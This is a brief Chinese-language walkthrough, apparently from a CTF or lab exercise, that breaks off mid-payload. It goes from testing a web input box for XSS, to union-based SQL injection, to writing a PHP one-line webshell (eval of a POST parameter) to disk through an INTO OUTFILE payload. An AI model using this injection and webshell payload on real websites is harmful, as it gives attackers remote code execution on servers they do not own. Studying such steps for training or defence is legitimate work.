1.打开网站看到有输入框，先测试以下有没有xss，能弹窗，说明存在xss漏洞2.有xss大概率也存在sql注入，测试到3的时候发现有回显3.进一步得出库名4.要getshell的话我们可以尝试写一句话木马进去，构建payloadkey=-1'unionselect1,"<?php@eval($_POST[cmd]);?>",3intoout